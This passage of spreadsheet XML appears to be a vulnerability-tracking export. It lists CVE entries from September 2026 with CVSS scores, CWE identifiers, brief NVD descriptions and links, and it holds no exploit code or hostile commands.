t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33389</t></is></c></row><row r="1454"><c r="A1454" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1454" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1454" s="5" t="inlineStr"><is><t>CVE-2026-33391</t></is></c><c r="D1454" s="5" t="n"><v>5.3</v></c><c r="E1454" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1454" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1454" s="5" t="inlineStr" /><c r="H1454" s="5" t="n"><v>0.003</v></c><c r="I1454" s="5" t="inlineStr" /><c r="J1454" s="5" t="inlineStr" /><c r="K1454" s="5" t="inlineStr" /><c r="L1454" s="5" t="inlineStr" /><c r="M1454" s="5" t="inlineStr" /><c r="N1454" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1454" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1454" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1454" s="5" t="inlineStr" /><c r="R1454" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1454" s="5" t="inlineStr"><is><t>An access control vulnerability was discovered in the Smart Polling configuration functionality due to insufficient validation of user privileges. An authenticated user with limited privileges can remotely bypass the intended access control of the web management interface and modify the Smart Polling discovery configuration. This allows the attacker to disrupt the visibility of assets in the monitored network.</t></is></c><c r="T1454" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33391</t></is></c></row><row r="1455"><c r="A1455" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1455" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1455" s="5" t="inlineStr"><is><t>CVE-2026-47680</t></is></c><c r="D1455" s="5" t="n"><v>5.3</v></c><c r="E1455" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1455" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1455" s="5" t="inlineStr" /><c r="H1455" s="5" t="n"><v>0.003</v></c><c r="I1455" s="5" t="inlineStr" /><c r="J1455" s="5" t="inlineStr"><is><t>kubernetes</t></is></c><c r="K1455" s="5" t="inlineStr" /><c r="L1455" s="5" t="inlineStr" /><c r="M1455" s="5" t="inlineStr" /><c r="N1455" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1455" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1455" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1455" s="5" t="inlineStr" /><c r="R1455" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="S1455" s="5" t="inlineStr"><is><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is></c><c r="T1455" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-47680</t></is></c></row><row r="1456"><c r="A1456" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1456" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1456" s="5" t="inlineStr"><is><t>CVE-2026-70575</t></is></c><c r="D1456" s="5" t="n"><v>5.3</v></c><c r="E1456" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1456" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1456" s="5" t="inlineStr" /><c r="H1456" s="5" t="n"><v>0.008</v></c><c r="I1456" s="5" t="inlineStr" /><c r="J1456" s="5" t="inlineStr" /><c r="K1456" s="5" t="inlineStr" /><c r="L1456" s="5" t="inlineStr" /><c r="M1456" s="5" t="inlineStr" /><c r="N1456" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1456" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1456" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1456" s="5" t="inlineStr" /><c r="R1456" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1456" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Schannel allows an authorized attacker to deny service over a network.</t></is></c><c r="T1456" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70575</t></is></c></row><row r="1457"><c r="A1457" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1457" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1457" s="5" t="inlineStr"><is><t>CVE-2026-77132</t></is></c><c r="D1457" s="5" t="n"><v>5.3</v></c><c r="E1457" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1457" s="5" t="inlineStr"><is><t>f4fb688c-4412-4426-b4b8-421ecf27b14a</t></is></c><c r="G1457" s="5" t="inlineStr" /><c r="H1457" s="5" t="n"><v>0.004</v></c><c r="I1457" s="5" t="inlineStr" /><c r="J1457" s="5" t="inlineStr" /><c r="K1457" s="5" t="inlineStr" /><c r="L1457" s="5" t="inlineStr" /><c r="M1457" s="5" t="inlineStr" /><c r="N1457" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1457" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1457" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1457" s="5" t="inlineStr" /><c r="R1457" s="5" t="inlineStr"><is><t>CWE-200, CWE-862</t></is></c><c r="S1457" s="5" t="inlineStr"><is><t>It has been discovered that several AJAX routes used for the backend localization wizard failed to perform authorization checks. This allowed authenticated, low-privileged backend users to access information about records and content elements that fall outside of their permitted range. Exploiting this vulnerability requires a low-privileged backend user account. This issue affects TYPO3 CMS versions 10.0.0-10.4.59, 11.0.0-11.5.53, 12.0.0-12.4.48, 13.0.0-13.4.34 and 14.0.0-14.3.6.</t></is></c><c r="T1457" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77132</t></is></c></row><row r="1458"><c r="A1458" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1458" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1458" s="5" t="inlineStr"><is><t>CVE-2026-78446</t></is></c><c r="D1458" s="5" t="n"><v>5.3</v></c><c r="E1458" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1458" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1458" s="5" t="inlineStr" /><c r="H1458" s="5" t="n"><v>0.006</v></c><c r="I1458" s="5" t="inlineStr" /><c r="J1458" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K14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58" s="5" t="inlineStr" /><c r="M1458" s="5" t="inlineStr" /><c r="N1458" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1458" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1458" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1458" s="5" t="inlineStr" /><c r="R1458" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1458" s="5" t="inlineStr"><is><t>Use after free in Windows Distributed File System (DFS) allows an authorized attacker to deny service over a network.</t></is></c><c r="T1458" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78446</t></is></c></row><row r="1459"><c r="A1459" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1459" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1459" s="5" t="inlineStr"><is><t>CVE-2026-78631</t></is></c><c r="D1459" s="5" t="n"><v>5.3</v></c><c r="E1459" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1459" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1459" s="5" t="inlineStr" /><c r="H1459" s="5" t="n"><v>0.001</v></c><c r="I1459" s="5" t="inlineStr" /><c r="J1459" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1459" s="5" t="inlineStr" /><c r="L1459" s="5" t="inlineStr" /><c r="M1459" s="5" t="inlineStr" /><c r="N1459" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1459" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1459" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1459" s="5" t="inlineStr" /><c r="R1459" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="S1459" s="5" t="inlineStr"><is><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is></c><c r="T1459" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78631</t></is></c></row><row r="1460"><c r="A1460" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1460" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1460" s="5" t="inlineStr"><is><t>CVE-2026-81380</t></is></c><c r="D1460" s="5" t="n"><v>5.3</v></c><c r="E1460" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1460" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1460" s="5" t="inlineStr" /><c r="H1460" s="5" t="n"><v>0.006</v></c><c r="I1460" s="5" t="inlineStr" /><c r="J1460" s="5" t="inlineStr" /><c r="K1460" s="5" t="inlineStr" /><c r="L1460" s="5" t="inlineStr" /><c r="M1460" s="5" t="inlineStr" /><c r="N1460" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1460" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1460" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1460" s="5" t="inlineStr" /><c r="R1460" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="S1460" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1460" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81380</t></is></c></row><row r="1461"><c r="A1461" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1461" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1461" s="5" t="inlineStr"><is><t>CVE-2026-86080</t></is></c><c r="D1461" s="5" t="n"><v>5.3</v></c><c r="E1461" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1461" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1461" s="5" t="inlineStr" /><c r="H1461" s="5" t="n"><v>0.002</v></c><c r="I1461" s="5" t="inlineStr" /><c r="J1461" s="5" t="inlineStr" /><c r="K1461" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1461" s="5" t="inlineStr" /><c r="M1461" s="5" t="inlineStr" /><c r="N1461" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1461" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1461" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1461" s="5" t="inlineStr" /><c r="R1461" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S1461" s="5" t="inlineStr"><is><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is></c><c r="T1461" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86080</t></is></c></row><row r="1462"><c r="A1462" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1462" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1462" s="5" t="inlineStr"><is><t>CVE-2026-86714</t></is></c><c r="D1462" s="5" t="n"><v>5.3</v></c><c r="E1462" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1462" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1462" s="5" t="inlineStr" /><c r="H1462" s="5" t="n"><v>0.002</v></c><c r="I1462" s="5" t="inlineStr" /><c r="J1462" s="5" t="inlineStr" /><c r="K1462" s="5" t="inlineStr" /><c r="L1462" s="5" t="inlineStr" /><c r="M1462" s="5" t="inlineStr" /><c r="N1462" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1462" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1462" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1462" s="5" t="inlineStr" /><c r="R1462" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1462" s="5" t="inlineStr"><is><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is></c><c r="T1462" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86714</t></is></c></row><row r="1463"><c r="A1463" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1463" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1463" s="5" t="inlineStr"><is><t>CVE-2026-86719</t></is></c><c r="D1463" s="5" t="n"><v>5.3</v></c><c r="E1463" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1463" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1463" s="5" t="inlineStr" /><c r="H1463" s="5" t="n"><v>0.001</v></c><c r="I1463" s="5" t="inlineStr" /><c r="J1463" s="5" t="inlineStr" /><c r="K1463" s="5" t="inlineStr" /><c r="L1463" s="5" t="inlineStr" /><c r="M1463" s="5" t="inlineStr" /><c r="N1463" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1463" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1463" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1463" s="5" t="inlineStr" /><c r="R1463" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1463" s="5" t="inlineStr"><is><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is></c><c r="T1463" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86719</t></is></c></row><row r="1464"><c r="A1464" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1464" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1464" s="5" t="inlineStr"><is><t>CVE-2026-86737</t></is></c><c r="D1464" s="5" t="n"><v>5.3</v></c><c r="E1464" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1464" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1464" s="5" t="inlineStr" /><c r="H1464" s="5" t="n"><v>0.002</v></c><c r="I1464" s="5" t="inlineStr" /><c r="J1464" s="5" t="inlineStr" /><c r="K1464" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L1464" s="5" t="inlineStr" /><c r="M1464" s="5" t="inlineStr" /><c r="N1464" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1464" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1464" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1464" s="5" t="inlineStr" /><c r="R1464" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1464" s="5" t="inlineStr"><is><t>snipe-it versions before 8.7.0 fail to enforce asset view authorization in the GET /hardware/{asset}/barcode endpoint. Authenticated attackers can iterate asset IDs to retrieve barcodes and enumerate asset tags across tenants, including soft-deleted and cross-company assets.</t></is></c><c r="T1464" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86737</t></is></c></row><row r="1465"><c r="A1465" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1465" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1465" s="5" t="inlineStr"><is><t>CVE-2026-11891</t></is></c><c r="D1465" s="5" t="n"><v>5.1</v></c><c r="E1465" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1465" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1465" s="5" t="inlineStr" /><c r="H1465" s="5" t="n"><v>0.001</v></c><c r="I1465" s="5" t="inlineStr" /><c r="J1465" s="5" t="inlineStr" /><c r="K1465" s="5" t="inlineStr" /><c r="L1465" s="5" t="inlineStr" /><c r="M1465" s="5" t="inlineStr" /><c r="N1465" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1465" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1465" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1465" s="5" t="inlineStr" /><c r="R1465" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1465" s="5" t="inlineStr"><is><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is></c><c r="T1465" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-11891</t></is></c></row><row r="1466"><c r="A1466" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1466" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1466" s="5" t="inlineStr"><is><t>CVE-2026-12387</t></is></c><c r="D1466" s="5" t="n"><v>5.1</v></c><c r="E1466" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1466" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1466" s="5" t="inlineStr" /><c r="H1466" s="5" t="n"><v>0.001</v></c><c r="I1466" s="5" t="inlineStr" /><c r="J1466" s="5" t="inlineStr" /><c r="K1466" s="5" t="inlineStr" /><c r="L1466" s="5" t="inlineStr" /><c r="M1466" s="5" t="inlineStr" /><c r="N1466" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1466" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1466" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1466" s="5" t="inlineStr" /><c r="R1466" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1466"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466" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12387</t></is></c></row><row r="1467"><c r="A1467" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1467" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1467" s="5" t="inlineStr"><is><t>CVE-2026-33387</t></is></c><c r="D1467" s="5" t="n"><v>5.1</v></c><c r="E1467" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1467" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1467" s="5" t="inlineStr" /><c r="H1467" s="5" t="n"><v>0.002</v></c><c r="I1467" s="5" t="inlineStr" /><c r="J1467" s="5" t="inlineStr" /><c r="K1467" s="5" t="inlineStr" /><c r="L1467" s="5" t="inlineStr" /><c r="M1467" s="5" t="inlineStr" /><c r="N1467" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1467" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1467" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1467" s="5" t="inlineStr" /><c r="R1467" s="5" t="inlineStr"><is><t>CWE-1336</t></is></c><c r="S1467" s="5" t="inlineStr"><is><t>A template injection vulnerability was discovered in the Dashboards functionality due to improper validation of an input parameter. An authenticated user with the required privileges can define a dashboard containing a malicious payload, or a victim can be socially engineered into importing a malicious dashboard. When the victim views or imports the dashboard, the payload executes in their browser context, allowing the attacker to modify application data or disrupt application availability.</t></is></c><c r="T1467" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33387</t></is></c></row><row r="1468"><c r="A1468" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1468" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1468" s="5" t="inlineStr"><is><t>CVE-2026-33920</t></is></c><c r="D1468" s="5" t="n"><v>5.1</v></c><c r="E1468" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1468" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1468" s="5" t="inlineStr" /><c r="H1468" s="5" t="n"><v>0.001</v></c><c r="I1468" s="5" t="inlineStr" /><c r="J1468" s="5" t="inlineStr" /><c r="K1468" s="5" t="inlineStr" /><c r="L1468" s="5" t="inlineStr" /><c r="M1468" s="5" t="inlineStr" /><c r="N1468" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1468" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1468" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1468" s="5" t="inlineStr" /><c r="R1468" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1468" s="5" t="inlineStr"><is><t>A cross-site request forgery vulnerability was discovered in the login functionality (both standard and SAML) due to missing validation of the anti-CSRF token. An attacker with a valid account can trick a victim into unknowingly authenticating with the attacker's credentials. Any operation performed by the victim in this state is attributed to the attacker's account, compromising the integrity of the audit trail.</t></is></c><c r="T1468" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33920</t></is></c></row><row r="1469"><c r="A1469" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1469" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1469" s="5" t="inlineStr"><is><t>CVE-2026-73317</t></is></c><c r="D1469" s="5" t="n"><v>5.1</v></c><c r="E1469" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1469" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1469" s="5" t="inlineStr" /><c r="H1469" s="5" t="n"><v>0.003</v></c><c r="I1469" s="5" t="inlineStr" /><c r="J1469" s="5" t="inlineStr" /><c r="K1469" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1469" s="5" t="inlineStr" /><c r="M1469" s="5" t="inlineStr" /><c r="N1469" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1469" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1469" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1469" s="5" t="inlineStr" /><c r="R1469" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1469" s="5" t="inlineStr"><is><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is></c><c r="T1469" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73317</t></is></c></row><row r="1470"><c r="A1470" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1470" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1470" s="5" t="inlineStr"><is><t>CVE-2026-73318</t></is></c><c r="D1470" s="5" t="n"><v>5.1</v></c><c r="E1470" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1470" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1470" s="5" t="inlineStr" /><c r="H1470" s="5" t="n"><v>0.003</v></c><c r="I1470" s="5" t="inlineStr" /><c r="J1470" s="5" t="inlineStr" /><c r="K1470" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1470" s="5" t="inlineStr" /><c r="M1470" s="5" t="inlineStr" /><c r="N1470" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1470" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1470" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1470" s="5" t="inlineStr" /><c r="R1470" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1470" s="5" t="inlineStr"><is><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is></c><c r="T1470" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73318</t></is></c></row><row r="1471"><c r="A1471" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1471" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1471" s="5" t="inlineStr"><is><t>CVE-2026-73319</t></is></c><c r="D1471" s="5" t="n"><v>5.1</v></c><c r="E1471" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1471" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1471" s="5" t="inlineStr" /><c r="H1471" s="5" t="n"><v>0.003</v></c><c r="I1471" s="5" t="inlineStr" /><c r="J1471" s="5" t="inlineStr" /><c r="K1471" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1471" s="5" t="inlineStr" /><c r="M1471" s="5" t="inlineStr" /><c r="N1471" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1471" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1471" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1471" s="5" t="inlineStr" /><c r="R1471" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1471" s="5" t="inlineStr"><is><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is></c><c r="T1471" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73319</t></is></c></row><row r="1472"><c r="A1472" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1472" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1472" s="5" t="inlineStr"><is><t>CVE-2026-73320</t></is></c><c r="D1472" s="5" t="n"><v>5.1</v></c><c r="E1472" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1472" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1472" s="5" t="inlineStr" /><c r="H1472" s="5" t="n"><v>0.003</v></c><c r="I1472" s="5" t="inlineStr" /><c r="J1472" s="5" t="inlineStr" /><c r="K1472" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1472" s="5" t="inlineStr" /><c r="M1472" s="5" t="inlineStr" /><c r="N1472" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1472" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1472" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1472" s="5" t="inlineStr" /><c r="R1472" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S1472" s="5" t="inlineStr"><is><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is></c><c r="T1472" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73320</t></is></c></row><row r="1473"><c r="A1473" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1473" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1473" s="5" t="inlineStr"><is><t>CVE-2026-84386</t></is></c><c r="D1473" s="5" t="n"><v>5.1</v></c><c r="E1473" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1473" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1473" s="5" t="inlineStr" /><c r="H1473" s="5" t="n"><v>0.001</v></c><c r="I1473" s="5" t="inlineStr" /><c r="J1473" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1473" s="5" t="inlineStr" /><c r="L1473" s="5" t="inlineStr" /><c r="M1473" s="5" t="inlineStr" /><c r="N1473" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1473" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1473" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1473" s="5" t="inlineStr" /><c r="R1473" s="5" t="inlineStr"><is><t>CWE-283</t></is></c><c r="S1473" s="5" t="inlineStr"><is><t>A unverified ownership vulnerability in Fortinet FortiClientWindows 7.4.0 through 7.4.7, FortiClientWindows 7.2 all versions may allow attacker to improper access control via &lt;insert attack vector here&gt;</t></is></c><c r="T1473" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84386</t></is></c></row><row r="1474"><c r="A1474" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1474" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1474" s="5" t="inlineStr"><is><t>CVE-2026-86516</t></is></c><c r="D1474" s="5" t="n"><v>5.1</v></c><c r="E1474" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1474" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1474" s="5" t="inlineStr" /><c r="H1474" s="5" t="n"><v>0.002</v></c><c r="I1474" s="5" t="inlineStr" /><c r="J1474" s="5" t="inlineStr" /><c r="K1474" s="5" t="inlineStr" /><c r="L1474" s="5" t="inlineStr" /><c r="M1474" s="5" t="inlineStr" /><c r="N1474" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1474" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1474" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1474" s="5" t="inlineStr" /><c r="R1474" s="5" t="inlineStr"><is><t>CWE-266, CWE-269</t></is></c><c r="S1474" s="5" t="inlineStr"><is><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is></c><c r="T1474" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86516</t></is></c></row><row r="1475"><c r="A1475" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1475" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1475" s="5" t="inlineStr"><is><t>CVE-2026-72976</t></is></c><c r="D1475" s="5" t="n"><v>5</v></c><c r="E1475" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1475" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1475" s="5" t="inlineStr" /><c r="H1475" s="5" t="n"><v>0.004</v></c><c r="I1475" s="5" t="inlineStr" /><c r="J1475" s="5" t="inlineStr" /><c r="K1475" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1475" s="5" t="inlineStr" /><c r="M1475" s="5" t="inlineStr" /><c r="N1475" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1475" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1475" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1475" s="5" t="inlineStr" /><c r="R1475" s="5" 